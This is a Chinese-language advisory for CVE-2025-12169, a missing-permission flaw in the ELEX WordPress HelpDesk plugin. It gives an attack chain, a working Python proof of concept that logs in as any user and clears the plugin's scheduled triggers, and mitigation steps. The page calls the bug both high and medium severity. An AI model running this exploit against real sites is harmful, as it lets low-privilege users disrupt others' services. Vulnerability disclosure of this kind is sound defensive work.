CVE-2025-12169 ELEX WordPress HelpDesk插件权限绕过漏洞

漏洞信息

漏洞编号

CVE-2025-12169

漏洞类型

权限绕过/未授权访问

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

ELEX WordPress HelpDesk & Customer Ticketing System

漏洞概述

CVE-2025-12169是WordPress插件ELEX WordPress HelpDesk & Customer Ticketing System中的一个高危安全漏洞。该插件是一款流行的客户服务工单系统，帮助网站管理员管理客户支持请求。该漏洞源于插件在处理AJAX请求时缺少适当的权限验证检查。具体来说，插件的'wp_ajax_eh_crm_settings_empty_scheduled_actions' AJAX动作没有验证当前用户是否具有管理权限，导致任何已认证用户（包括最低权限的Subscriber订阅者角色）都可以调用此接口。这一缺陷使得攻击者能够未授权地清除网站上的计划触发器选项，可能导致工单系统的定时任务、提醒通知等功能失效，影响正常业务运营。虽然CVSS评分为4.3（中等），但该漏洞可被低权限用户利用，降低了攻击门槛，且可能导致服务中断。

技术细节

该漏洞属于WordPress插件常见的权限控制缺陷。在WordPress中，AJAX处理函数通常使用wp_ajax_钩子注册，用于处理前端异步请求。正确的实现应该在处理函数开始时检查当前用户的权限，例如使用current_user_can()函数验证用户是否具有管理员权限。

然而，ELEX WordPress HelpDesk插件的wp_ajax_eh_crm_settings_empty_scheduled_actions处理函数缺少此类检查。攻击者只需构造一个POST请求到wp-admin/admin-ajax.php，包含action参数设置为eh_crm_settings_empty_scheduled_actions，即可触发该函数执行。

该函数的功能是清空插件的scheduled_actions选项数据，这会删除所有预定的工单触发器配置。由于WordPress的Subscriber角色用户默认可以访问AJAX端点（需要登录），攻击者可以利用这一点，在不需要管理员权限的情况下破坏工单系统的定时功能。

利用条件：1) 攻击者需要拥有一个有效的WordPress账户（任何角色）；2) 攻击者需要知道目标网站使用该插件且版本受影响。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress网站的有效用户账户（任何权限级别，包括Subscriber订阅者角色）

STEP 2

步骤2

攻击者构造恶意AJAX请求，POST到/wp-admin/admin-ajax.php，action参数设置为eh_crm_settings_empty_scheduled_actions

STEP 3

步骤3

由于插件缺少current_user_can()权限验证，服务器直接执行清空scheduled_actions选项的数据库操作

STEP 4

步骤4

工单系统的计划触发器配置被完全删除，导致定时任务、自动化提醒等功能失效

STEP 5

步骤5

网站管理员需要手动重新配置所有计划触发器，造成业务中断和运维负担

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-12169 PoC
# ELEX WordPress HelpDesk - Unauthorized scheduled actions clearing

target_url = input("Enter target URL: ").strip().rstrip('/')
username = input("Enter username: ").strip()
password = input("Enter password: ").strip()

session = requests.Session()

# Step 1: Login to WordPress
login_url = f"{target_url}/wp-login.php"
login_data = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'redirect_to': f"{target_url}/wp-admin/",
    'testcookie': '1'
}

print("[*] Attempting to login...")
response = session.post(login_url, data=login_data, allow_redirects=False)

if 'wordpress_logged_in' not in str(session.cookies) and response.status_code == 302:
    print("[-] Login may have failed. Check credentials.")
    sys.exit(1)

print("[+] Login successful!")

# Step 2: Trigger the vulnerable AJAX action
ajax_url = f"{target_url}/wp-admin/admin-ajax.php"
ajax_data = {
    'action': 'eh_crm_settings_empty_scheduled_actions'
}

print("[*] Sending exploit request to clear scheduled actions...")
exploit_response = session.post(ajax_url, data=ajax_data)

# Step 3: Check response
if exploit_response.status_code == 200:
    print("[+] Exploit sent successfully!")
    print(f"[*] Response: {exploit_response.text[:200]}")
    print("[!] Scheduled triggers have been cleared.")
else:
    print(f"[-] Exploit failed with status code: {exploit_response.status_code}")

影响范围

ELEX WordPress HelpDesk & Customer Ticketing System <= 3.3.0

防御指南

临时缓解措施

如果无法立即升级插件，可临时采取以下措施：1) 审查所有用户账户，删除不必要的订阅者账户；2) 使用Web应用防火墙（WAF）规则阻止对admin-ajax.php的异常请求；3) 限制wp-admin目录访问，仅允许管理员IP访问；4) 监控网站日志，关注频繁的AJAX请求。但这些措施仅为临时缓解，不能完全替代升级插件。